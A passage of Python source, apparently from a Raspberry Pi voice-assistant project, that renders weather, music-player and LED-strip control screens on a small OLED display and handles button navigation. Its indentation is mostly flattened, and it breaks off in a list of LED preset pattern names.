while self.affichage == 'météo':
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
buton = 20000
if time.strftime("%S") == '00' :
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
if fio.has_currently() is True:
currently = FIOCurrently.FIOCurrently(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if fio.has_daily() is True:
daily = FIODaily.FIODaily(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if afmete == 'currently':
if currently.icon == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'hail' or currently.icon == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif currently.icon == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg')
icon = icon.resize((34,35))
icon = ImageOps.invert(icon)
image.paste(icon,(0,12))
draw.line((2,26,11,26), fill=255)
temp = Image.open('~/google-assistant/src/images/weather/temperature.jpg')
temp = temp.resize((18,15))
temp = ImageOps.invert(temp)
temp = temp.crop(temp.getbbox())
image.paste(temp,(38,14))
draw.rectangle((39, 25, 42, 27), outline=255, fill=255)
humidity = Image.open('~/google-assistant/src/images/weather/humidity.jpg')
humidity = humidity.resize((14,14))
humidity = ImageOps.invert(humidity)
humidity = humidity.crop(humidity.getbbox())
image.paste(humidity,(37,33))
wind = Image.new('1', (11,11))
ImageDraw.Draw(wind).polygon([(5,0),(0,5),(4,5),(4,10),(6,10),(6,5),(10,5)],fill=255,outline=255)
try:
wind = wind.rotate(angle=round(currently.windBearing),expand=True,fillcolor=0)
except AttributeError:
pass
image.paste(wind,(round(78.5-(wind.size[0]/2)),round(21.5-(wind.size[1]/2))))
precip = Image.open('~/google-assistant/src/images/weather/pluviometer.jpg')
precip = precip.resize((15,15))
precip = ImageOps.invert(precip)
image.paste(precip,(71,32))
draw.line((78,45,78,46), fill=0)
draw.line((73,32,83,32), fill=0)
draw.text((47,16),str(round(currently.temperature))+'°C', font=font, fill=225)
draw.text((47,34),str(round(currently.humidity*100))+'%', font=font, fill=225)
if currently.windSpeed < 10:
if '.0' in str(round(currently.windSpeed,1)):
draw.text((87,16),str(round(currently.windSpeed,1)).replace('.0','')+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(currently.windSpeed,1))+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(currently.windSpeed))+'km/h', font=font, fill=225)
if currently.precipIntensity < 10:
if '.0' in str(round(currently.precipIntensity,1)):
draw.text((87,34),str(round(currently.precipIntensity,1)).replace('.0','')+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(currently.precipIntensity,1))+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(currently.precipIntensity))+'mm/h', font=font, fill=225)
if int(time.strftime("%S")) % 2 == 0 :
time_day = time.strftime('%a %d %b %Y %H:%M')
else:
time_day = time.strftime('%a %d %b %Y %H %M')
draw.text(((128 - (len(time_day) * 6)) / 2,0),time_day, font=font, fill=225)
if len(currently.summary) * 6 > 128 :
if direc == 0 :
if len(currently.summary) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.text((x,50),currently.summary, font=font, fill=225)
else:
draw.text(((128 - (len(currently.summary) * 6)) / 2,50),currently.summary, font=font, fill=225)
elif afmete == 'dailys':
for day in range(0, daily.days()):
if day > -1 and day < 6:
fday = daily.get_day(day)
if fday['icon'] == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'hail' or fday['icon'] == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
elif fday['icon'] == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg').resize((50,50))
icon = ImageOps.invert(icon)
icon = icon.crop(icon.getbbox())
icon = icon.resize((27,17))
ImageDraw.Draw(icon).rectangle((0, 7, 21, 7), outline=0, fill=0)
if day == 0:
if daysel == 0:
draw.rectangle((6, 0, 36, 20), outline=255, fill=0)
image.paste(icon,(8,2))
time_day = 'Ytd'
draw.text((22 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 1:
if daysel == 1:
draw.rectangle((48, 0, 78, 20), outline=255, fill=0)
image.paste(icon,(50,2))
time_day = 'Tdy'
draw.text((64 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 2:
if daysel == 2:
draw.rectangle((90, 0, 120, 20), outline=255, fill=0)
image.paste(icon,(92,2))
time_day = 'Tmw'
draw.text((106 - ((len(time_day) * 6) / 2),20),time_day, font=font, fill=225)
elif day == 3:
if daysel == 3:
draw.rectangle((6, 32, 36, 52), outline=255, fill=0)
image.paste(icon,(8,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((22 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif day == 4:
if daysel == 4:
draw.rectangle((48, 32, 78, 52), outline=255, fill=0)
image.paste(icon,(50,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((64 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif day == 5:
if daysel == 5:
draw.rectangle((90, 32, 120, 52), outline=255, fill=0)
image.paste(icon,(92,34))
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a')
draw.text((106 - ((len(time_day) * 6) / 2),52),time_day, font=font, fill=225)
elif afmete == 'daily':
day = daysel
fday = daily.get_day(day)
if fday['icon'] == 'cloudy':
icon = Image.open('~/google-assistant/src/images/weather/cloud.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'hail' or fday['icon'] == 'sleet':
icon = Image.open('~/google-assistant/src/images/weather/hail.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'fog':
icon = Image.open('~/google-assistant/src/images/weather/haze.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'clear-night':
icon = Image.open('~/google-assistant/src/images/weather/moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'partly-cloudy-night':
icon = Image.open('~/google-assistant/src/images/weather/partly-moon.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'partly-cloudy-day':
icon = Image.open('~/google-assistant/src/images/weather/partly-sunny.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'rain':
icon = Image.open('~/google-assistant/src/images/weather/rain.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'snow':
icon = Image.open('~/google-assistant/src/images/weather/snow.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'thunderstorm':
icon = Image.open('~/google-assistant/src/images/weather/storm.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'clear-day':
icon = Image.open('~/google-assistant/src/images/weather/sun.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'tornado':
icon = Image.open('~/google-assistant/src/images/weather/tornado.jpg')
icon = icon.resize((50,50))
icon = ImageOps.invert(icon)
image.paste(icon,(-7,5))
elif fday['icon'] == 'wind':
icon = Image.open('~/google-assistant/src/images/weather/wind.jpg')
icon = icon.resize((34,35))
icon = ImageOps.invert(icon)
image.paste(icon,(0,12))
draw.line((2,26,11,26), fill=255)
tmin = Image.open('~/google-assistant/src/images/weather/tmin.jpg')
tmin = tmin.resize((18,15))
tmin = ImageOps.invert(tmin)
tmin = tmin.crop(tmin.getbbox())
image.paste(tmin,(38,14))
draw.rectangle((39, 25, 42, 27), outline=255, fill=255)
tmax = Image.open('~/google-assistant/src/images/weather/tmax.jpg')
tmax = tmax.resize((18,15))
tmax = ImageOps.invert(tmax)
tmax = tmax.crop(tmax.getbbox())
image.paste(tmax,(38,32))
draw.rectangle((39, 43, 42, 45), outline=255, fill=255)
wind = Image.new('1', (11,11))
ImageDraw.Draw(wind).polygon([(5,0),(0,5),(4,5),(4,10),(6,10),(6,5),(10,5)],fill=255,outline=255)
try:
wind = wind.rotate(angle=round(fday['windBearing']),expand=True,fillcolor=0)
except AttributeError:
pass
image.paste(wind,(round(78.5-(wind.size[0]/2)),round(21.5-(wind.size[1]/2))))
precip = Image.open('~/google-assistant/src/images/weather/pluviometer.jpg')
precip = precip.resize((15,15))
precip = ImageOps.invert(precip)
image.paste(precip,(71,32))
draw.line((78,45,78,46), fill=0)
draw.line((73,32,83,32), fill=0)
draw.text((47,16),str(round(fday['temperatureMin']))+'°C', font=font, fill=225)
draw.text((47,34),str(round(fday['temperatureMax']))+'°C', font=font, fill=225)
if fday['windSpeed'] < 10:
if '.0' in str(round(fday['windSpeed'],1)):
draw.text((87,16),str(round(fday['windSpeed'],1)).replace('.0','')+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(fday['windSpeed'],1))+'km/h', font=font, fill=225)
else:
draw.text((87,16),str(round(fday['windSpeed']))+'km/h', font=font, fill=225)
if fday['precipIntensity'] < 10:
if '.0' in str(round(fday['precipIntensity'],1)):
draw.text((87,34),str(round(fday['precipIntensity'],1)).replace('.0','')+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(fday['precipIntensity'],1))+'mm/h', font=font, fill=225)
else:
draw.text((87,34),str(round(fday['precipIntensity']))+'mm/h', font=font, fill=225)
if day == 0:
time_day = 'Yesterday'
elif day == 1:
time_day = 'Today'
elif day == 2:
time_day = 'Tomorrow'
else:
time_day = datetime.datetime.utcfromtimestamp(int(fday['time'])).strftime('%a %d %b %Y')
draw.text(((128 - (len(time_day) * 6)) / 2,0),time_day, font=font, fill=225)
if len(fday['summary']) * 6 > 128 :
if direc == 0 :
if len(fday['summary']) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.text((x,50),fday['summary'], font=font, fill=225)
else:
draw.text(((128 - (len(fday['summary']) * 6)) / 2,50),fday['summary'], font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
while self.affichage == 'météo' and buton > 0:
if not len(self.buton) == 0:
direc = 0
x = 4
self.veil = 0
if self.buton[0] == 0:
del self.buton[0]
if afmete == 'currently':
afmete = 'dailys'
elif afmete == 'dailys':
afmete = 'currently'
elif afmete == 'daily':
afmete = 'currently'
elif self.buton[0] == 1:
del self.buton[0]
if afmete == 'currently':
afmete = 'dailys'
elif afmete == 'dailys':
afmete = 'daily'
elif afmete == 'daily':
afmete = 'dailys'
elif self.buton[0] == 2:
del self.buton[0]
if afmete == 'currently':
Myassistant.execute_next(self,'right')
elif afmete == 'dailys':
daysel = daysel+1
if daysel+1 > daily.days() or daysel > 5:
daysel = 0
elif afmete == 'daily':
daysel = daysel+1
if daysel+1 > daily.days() or daysel > 5:
daysel = 0
elif self.buton[0] == 3:
del self.buton[0]
if afmete == 'currently':
Myassistant.execute_next(self,'left')
elif afmete == 'dailys':
daysel = daysel-1
if daysel < 0:
if daily.days()+1 > 6:
daysel = 5
else:
daysel = daily.days()
elif afmete == 'daily':
daysel = daysel-1
if daysel < 0:
if daily.days()+1 > 6:
daysel = 5
else:
daysel = daily.days()
self.veil = 0
if not len(self.buton) == 0:
buton = 20000
else:
buton = 0
buton = buton - 1
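    # Music screen. Draws two boxes on the 128x64 OLED: the top one holds the
    # volume and sleep-timer icons plus a scrolling track title (with a small
    # random "equaliser" animation while playing), the bottom one the
    # previous / play-pause / next / stop controls. `mop` is the highlighted
    # control: 0 none, 1 volume, 2 sleep timer, 3 previous, 4 play/pause,
    # 5 next, 6 stop. Playback itself is delegated to the vlc helper module;
    # sources are either the radios or the music path from the settings file.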
def aff_music(self):
self.affichage = 'music'
mop = 0
mux = random.randint(0,128)
while self.affichage == 'music':
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.rectangle((0, 0, 127, 34), outline=255, fill=0)
draw.rectangle((0, 37, 127, 63), outline=255, fill=0)
if mop == 1:
draw.polygon([(90,8), (95,8), (105,2),(105,20),(95,14),(90,14)], outline=255, fill=255)
else :
draw.polygon([(90,8), (95,8), (105,2),(105,20),(95,14),(90,14)], outline=255, fill=0)
if mop == 2:
draw.rectangle((107, 2, 125, 20), outline=255, fill=255)
draw.text((111,5),'Zz' , font=font, fill=0)
else :
draw.rectangle((107, 2, 125, 20), outline=255, fill=0)
draw.text((111,5),'Zz' , font=font, fill=255)
t = 14
lx = 2
ly = 20
if not vlc.is_pause():
mux = mux - 4
if mux < 0-(len(vlc.get_title())*6) :
mux = 128
draw.text((mux,22),vlc.get_title() , font=font, fill=225)
if mop == 4:
draw.rectangle((41, 40, 46, 60), outline=255, fill=255)
draw.rectangle((51, 40, 56, 60), outline=255, fill=255)
else:
draw.rectangle((41, 40, 46, 60), outline=255, fill=0)
draw.rectangle((51, 40, 56, 60), outline=255, fill=0)
while t > 0 :
s = random.randint(1,10)
ly = 20
while s > 0 :
draw.rectangle((lx,ly,lx + 4,ly), outline=255, fill=255)
ly = ly - 2
s = s - 1
lx = lx + 6
t = t - 1
else :
if vlc.is_vlc_playing():
mux = mux - 4
if mux < 0-(len(vlc.get_title())*6) :
mux = 128
draw.text((mux,22),vlc.get_title() , font=font, fill=225)
if mop == 4:
draw.polygon([(44,40), (54,50), (44,60)], outline=255, fill=255)
else:
draw.polygon([(44,40), (54,50), (44,60)], outline=255, fill=0)
while t > 0 :
draw.rectangle((lx,ly,lx + 4,ly), outline=255, fill=255)
lx = lx + 6
t = t - 1
if mop == 3:
draw.rectangle((3, 40, 8, 60), outline=255, fill=255)
draw.polygon([(19,40), (9,50), (19,60)], outline=255, fill=255)
draw.polygon([(30,40), (20,50), (30,60)], outline=255, fill=255)
else:
draw.rectangle((3, 40, 8, 60), outline=255, fill=0)
draw.polygon([(19,40), (9,50), (19,60)], outline=255, fill=0)
draw.polygon([(30,40), (20,50), (30,60)], outline=255, fill=0)
if mop == 5:
draw.polygon([(67,40), (77,50), (67,60)], outline=255, fill=255)
draw.polygon([(78,40), (88,50), (78,60)], outline=255, fill=255)
draw.rectangle((89, 40, 94, 60), outline=255, fill=255)
else:
draw.polygon([(67,40), (77,50), (67,60)], outline=255, fill=0)
draw.polygon([(78,40), (88,50), (78,60)], outline=255, fill=0)
draw.rectangle((89, 40, 94, 60), outline=255, fill=0)
if mop == 6:
draw.rectangle((104, 40, 124, 60), outline=255, fill=255)
else:
draw.rectangle((104, 40, 124, 60), outline=255, fill=0)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while self.affichage == 'music' and buton > 0:
if not len(self.buton) == 0:
self.veil = 0
if self.buton[0] == 0:
del self.buton[0]
if mop == 0:
mop = 4
else:
mop = 0
elif self.buton[0] == 1:
del self.buton[0]
if mop == 0:
mop = 4
else:
if mop == 1:
vol = Myassistant.volume_get()
Myassistant.volume_set(int(Myassistant.select_cursor(self,100,0,5,vol,'%','volume')))
elif mop == 2:
if self.act_cron[0] == ['X','XX','XX','vlc.stop_vlc()#cantdel']:
slt = Myassistant.select_time(self,'--', '--', '-', 'sleep time',True)
else:
slt = Myassistant.select_time(self,self.act_cron[0][1], self.act_cron[0][2], self.act_cron[0][0], 'sleep time',True)
if slt[0] == '--' or slt[1] == '--':
self.act_cron[0] = ['X','XX','XX','vlc.stop_vlc()#cantdel']
self.var_save["Music stop"] = str('X,XX,XX')
else:
self.act_cron[0] = [slt[2],slt[0],slt[1],'vlc.stop_vlc()#cantdel']
self.var_save["Music stop"] = str(slt[2] + ',' + slt[0] + ',' + slt[1])
Myassistant.save_var_in_file(self)
elif mop == 3:
vlc.previous_vlc()
elif mop == 4:
if vlc.is_vlc_playing():
if vlc.is_pause():
vlc.resume_vlc()
else:
vlc.pause_vlc()
elif not vlc.is_vlc_playing():
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
radsel = Myassistant.select_list(self,radiona,'Radios')
if not radsel == None:
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
vlc.play_audio_file(radsel)
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not j == None:
disp.clear()
Myassistant.refrech_error()
if os.path.isdir(j):
vlc.play_audio_folder(j)
else:
vlc.play_audio_file(j)
time.sleep(0.2)
while not len(self.buton) == 0:
del self.buton[0]
else:
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not j == None:
disp.clear()
Myassistant.refrech_error()
if os.path.isdir(j):
vlc.play_audio_folder(j)
else:
vlc.play_audio_file(j)
time.sleep(0.2)
while not len(self.buton) == 0:
del self.buton[0]
else:
vlc.resume_vlc()
elif mop == 5:
vlc.next_vlc()
elif mop == 6:
vlc.stop_vlc()
elif self.buton[0] == 2:
del self.buton[0]
if mop == 0:
Myassistant.execute_next(self,'right')
elif not mop + 1 > 6:
mop = mop + 1
else:
mop = 1
elif self.buton[0] == 3:
del self.buton[0]
if mop == 0:
Myassistant.execute_next(self,'left')
elif not mop - 1 < 1:
mop = mop - 1
else:
mop = 6
self.veil = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
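    # LED strip screen. Opens one flux_led WifiLedBulb per entry of the
    # "Led strips names" setting and shows either the averaged state of all
    # bulbs ("All") or a single bulb: on/off, brightness, strip selector,
    # colour / preset-pattern picker, alarm menu, the "Custom colors" presets
    # and the raw R/G/B/W values. `selection` is [editing?, focused field];
    # field 10 means nothing is focused, so the side buttons switch screens.
    # A BrokenPipeError from a bulb aborts back to the clock screen.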
def aff_led_strip(self):
self.affichage = 'led strip'
try:
ifwantreload = 0
cont = True
name = 'All'
name_wifi_led = []
ip_wifi_led=[]
listwifi={}
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1],timeout=1)
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = []
coloraction = []
for color in settings.get('Custom colors'):
colorlist.append(color[0])
coloraction.append(color[1])
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 10]
while cont and self.affichage == 'led strip' :
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adress in listwifi:
wifiled = listwifi[adress]
                        wifiled.refreshState()
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((99, 15, (len(str('+')) * 6) + 101, 25), outline=255, fill=0)
draw.text((101,15), '+', font=font, fill=225)
if selection[1] == 4:
draw.rectangle((117, 15, 127, 25), outline=255, fill=0)
alar = Image.open('~/google-assistant/src/images/led_strip/alarme.jpg')
alar = alar.resize((7,7))
alar = ImageOps.invert(alar)
image.paste(alar, (119,17))
draw.line((122,21,122,19), fill=255)
draw.line((122,21,123,21), fill=255)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while self.affichage == 'led strip' and buton > 0:
if not len(self.buton) == 0:
self.veil = 0
if self.buton[0] == 0 :
del self.buton[0]
if selection[1] == 10:
selection[1] = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
else:
selection[1] = 10
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
                                    name = 'All'
elif selection[1] == 3:
ffgddsj = Myassistant.select_list(self,[['Colors','color'],['Preset pattern','pattern'],['Exit','exit']],'choice')
if ffgddsj == 'pattern':
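                                    # Parallel lists: human-readable pattern names and the matching
                                    # flux_led setPresetPattern(code, speed) calls (codes 0x25-0x38);
                                    # they are zipped into [name, action] pairs for select_list below,
                                    # and the chosen call is applied to the bulb(s) with eval().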
fgcolorpatname = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
